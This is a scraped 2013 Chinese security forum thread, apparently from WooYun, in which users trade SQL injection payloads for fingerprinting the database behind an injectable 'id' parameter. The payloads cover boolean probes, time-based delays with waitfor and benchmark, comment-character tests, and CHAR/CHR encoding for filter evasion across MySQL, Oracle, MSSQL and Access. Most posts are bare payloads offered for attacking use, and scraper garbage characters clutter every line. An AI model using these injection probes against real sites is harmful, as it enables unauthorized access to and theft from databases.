一个注射点如何最快速确认是什么类型数据库
* P( ]0 L( V2 ]0 W$ z* A) `( u0 p6 fxsser (十根阳具有长短!!) | 2013-02-05 12:36
/ ?3 e+ P& q, y假设这么一个注射点:
% R. Y; i1 V! Vshow.html?id=2& f5 d* {) O6 v. m- {
mysql:id=2 and version()>0
% B7 }8 y1 w0 [8 E) ^oracle:id=2 and '1'||'1'='11
; l/ y) l. }% A8 J8 N9 d7 a其他的欢迎补充& I6 N, N3 D1 a8 o* @# ^
1#
3 B" s4 V" d7 X& Yupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47: b8 `5 x. E% }4 g3 X
Access:
2 ~) F% M; d" s5 p4 z$ h* }0 vaNd aSc(cHr(97))=97
9 j& g x ]0 q3 d8 o# Hand exists(select id from MSysAccessObjects)" Z; F! S3 Z" L: ^" i
SQL Server:! E( j$ T+ S/ Z9 {* i/ Z+ w
and exists(select id from sysobjects)
' x" W( P1 f3 u' G# I2 e7 {and length(user)>0
5 p& r; Z2 y- L7 s) B1 nMySQL:
2 C5 }3 [; F" ~1 h! Rand length(user())>07 S& g& X: K% }4 K8 C, ]: M {0 s
2#4 m8 C) k x0 X/ g! ]) _) q: x5 N
xsser (十根阳具有长短!!) | 2013-02-05 12:485 p0 ~* i. L* x$ S% h& ?+ f( S
@upload 如果这些都不是呢…
# D3 p. Z5 b5 l5 _8 A3#
1 |( s1 B' A7 P; v' c' [# nupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:032 F0 n: h- V( L4 a/ Y- H% i
@xsser 不快速的,延时注入
; O4 P$ @: n: z/ r7 h1 x不知道这样写对不对% e* N) j" h& c
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'" }" g# A) C& M3 Y& b: g, ~% W
mysql:id=2 and select benchmark(1e8,current_date());) b, ^: _/ J6 e" R/ f
4#) {5 Y3 e3 y, O6 r7 Y! i
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
/ q* L+ b) C: t3 w+ B. L最快的貌似是看报错信息1 v' O9 \+ O- u! [3 [$ {4 i1 t; i
oracle error
4 y9 ^, S; |0 Y. o- Q. J8 Y$ G8 B2 Umssql error
9 f N$ j1 b/ d+ D- ]' mmysql error
" [2 K P* I8 n: ^5#7 |' ?" P) k7 }' w% J+ G; S7 `
Nimda (你们都是坏银~) | 2013-02-05 13:14
2 u: j0 S$ a8 o4 {9 a& A, ^4 _- w0 _小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
0 E1 U9 _$ q6 g e6 D. W* W6#" T$ d: t* D9 n% x4 ]( O) {9 D
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
9 l u( A/ G$ n# m$ {1 N“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
9 T( b. c; O8 L" _! ^- X0 n* }“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
+ E7 Z0 N1 G( f# |$ o; q“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。, J% `) g" D1 w; k, {8 ]% f
7#
$ j _# J7 U1 c$ F: M_Evil (HackEnd) | 2013-02-05 13:33
. k7 `" \1 ^; D8 c) k4 XPostgreSQL" y- b4 W4 ?6 L
8#) n& C; b! D1 {6 x
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
& B' d* R: a2 [# X切换编码 and 1=1
8 g" d: G8 r/ Noracle:
( P( [# R1 j# f+ {3 LCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
/ W0 \/ Q h: {# f+ I5 b/ o" Hmssql:
' Y) ]6 S" ?& ~/ LCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
' t) B4 c1 m( s% w7 Z+ F- w9 ?mysql:: h% }% \- O( l& B
CHAR(97, 110, 100, 32, 49, 61, 49)
$ q9 D5 E1 m% \7 g$ I6 J9#
: R4 U* T% t- {3 j5 Vxsser (十根阳具有长短!!) | 2013-02-05 14:318 k( \4 t& G6 g1 I
@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?6 Q2 r' X; H; ?# o
10#6 n' d/ }* j+ T+ q
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46, m0 f9 O* H7 c4 D0 l% @
@xsser 是奇葩数据库类型的么?
% Y6 B7 N [, l& I根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
5 R' H/ ?$ F0 i7 K1.是否可以使用特定的函数来判断,该数据库特有的' }* l& }- h' D+ N7 t `3 [" ^# Y0 \* f
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等 P6 [$ l" ?9 m/ V4 ~; i
3.是否可以编码查询9 Z& Z8 q7 o5 C# q& y
4.是否显可以利用错信息
7 z$ m& A/ X) r" U5.是否存在数据库某些特性辅助判断
) l8 \8 Y% d5 a1 ?8 b' A个人见解: ~ ~* ^- Z. S# U0 C
11#
, n) u7 V/ |* g7 J0 m3 x& i- E小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55. r+ I. k! X3 U. h" B
已收藏,mssql可以直接看到错误提示的吧~
# A1 ?% C4 Q6 u$ _# c12#/ _' @ M9 K. f" |1 |4 j
Passer_by | 2013-02-05 15:09) X, ? A m, w5 I, R2 h
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。! W5 [9 V) p8 E3 P8 c
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对